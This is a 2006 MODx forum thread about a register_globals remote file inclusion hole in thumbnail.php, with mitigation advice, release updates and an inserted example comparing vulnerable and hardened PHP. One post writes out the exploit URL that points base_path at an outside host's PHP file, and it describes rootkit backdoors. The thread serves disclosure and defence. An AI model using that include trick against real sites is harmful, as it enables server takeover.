Thanks. I still don't know, because I know little. I think the global $basepath is outside the class; is this the problem?
What do we need to know to be secure when developing snippets?
Thanks in advance.
      Jabiertxof (formerly XYZVISUAL)
My business: http://marker.es
      https://www.youtube.com/user/jabiertxof/videos
      Would it be helpful to add this line to the .htaccess file in the document root, if you have register_globals set to ON?
      php_flag register_globals off

        Thanks for MODx - I love it!
Quote from: Maaike at Nov 06, 2006, 06:22 PM

        Would it be helpful to add this line to the .htaccess file in the document root, if you have register_globals set to ON?
        php_flag register_globals off

        Absolutely, though you have to make sure your server is configured to allow php directives in .htaccess or that will result in a 500 Internal Server Error.

        This is included, commented out, in the ht.access being distributed with the 0.9.5 release candidates.
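A worked illustration of the pattern this thread is about, added here as an example and not code from MODx or from any poster: a snippet that takes its include path from a global it never initialises (which register_globals lets a request parameter set), beside a version that fixes the path relative to the file itself and validates the only request-controlled value. The names thumbnail_unsafe, thumbnail_safe, $base_path, include/thumb_lib.php and images/ are assumptions.

```php
<?php
// Added example, not MODx code. Function, variable and path names are assumptions.

// BEFORE (the vulnerable pattern): the include path comes from a global that
// this file never sets. With register_globals=On, a request parameter named
// base_path becomes $base_path, so the include follows a caller-chosen path
// or URL instead of the one the snippet author intended.
function thumbnail_unsafe()
{
    global $base_path;
    include $base_path . 'include/thumb_lib.php';
}

// AFTER (hardened): the include path is a constant derived from this file's
// own location, and the image name taken from the request is allow-listed
// and confined to one directory before it is used.
define('THUMB_BASE', dirname(__FILE__) . '/');
define('THUMB_IMAGE_DIR', THUMB_BASE . 'images/');

function thumbnail_safe($image_param)
{
    // Fail closed if register_globals is still on, the same setting the
    // php_flag register_globals off line in .htaccess is meant to turn off.
    if (ini_get('register_globals')) {
        die('register_globals must be off');
    }
    // The library path is fixed at author time, never read from input.
    $lib = THUMB_BASE . 'include/thumb_lib.php';
    if (is_file($lib)) {
        include $lib;
    }
    // Accept only a plain file name: no directory separators, no URL schemes.
    if (!preg_match('/^[A-Za-z0-9_-]+\.(jpe?g|png|gif)$/', $image_param)) {
        return false;
    }
    // realpath() resolves symlinks and "..", so confirm the final location is
    // still inside the image directory before handing it back.
    $dir  = realpath(THUMB_IMAGE_DIR);
    $path = realpath(THUMB_IMAGE_DIR . $image_param);
    if ($dir === false || $path === false || strpos($path, $dir . '/') !== 0) {
        return false;
    }
    return $path;
}
```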
I tested it locally and used a PHP file I got that has tons of tools to FTP files from and to the server etc. All I had to do was say thumbnail.php?base_path=http://www.myserver.tld/hackfile.php and it started that external PHP on my webserver, and I could just upload a rootkit and got root access on the server.

You could also use a PHP script that has a piece of shellcode included, and that gives you shell access as root as well.

It was not hard at all to do. Luckily there are lots of script kiddies that do not really know what they are doing and just scan your machine and try the exploit and maybe replace your index.php so that your site is defaced.

If they are more technical, then they could use a rootkit and do a chroot on your server. That way they replace key binaries with their own binaries, like ls; then when you use ls it will also open a telnet port, and that way give hackers access to your server. They can even replace your ps command in a way that you cannot see the service they started. To scan for rootkits on your server, use RKHunter (Rootkit Hunter) to see if all the binaries still match the MD5 hash.

If not, the best thing is to roll the system out again.

          Dimmy
            follow me on twitter: @dimmy01
          • There is a new Security Notices Announcement thread with RSS and Email subscription options: http://modxcms.com/forums/index.php/topic,8718.msg61285.html#msg61285
              Ryan Thrash, MODX Co-Founder
              Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
              @ Ryan: Thank you a lot for implementing both wishes in this thread: RSS and Email.

              This is one more piece for me to love MODx, its developers and its community more.
                Gone away and found a better place to stay
No worries... there's more coming later today too.
                  Ryan Thrash, MODX Co-Founder
                  Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
Is the current stable release updated to fix this? The 0.9.2.1?

If not, would this be a good idea?
                    follow me on twitter: @dimmy01
                    Quote from: Dimmy at Nov 06, 2006, 11:08 PM

Is the current stable release updated to fix this? The 0.9.2.1?
The latest stable is 0.9.2.2.

                    Thanx MODxers!
Well, I got hacked on a demo site I had listed in a forum here. I went to completely delete the directory from the server, but the thumbnail.php won't delete; it says permission denied. I've sent the situation to my ISP to try and resolve. Not good. Is this what life is like for those of you running windoze?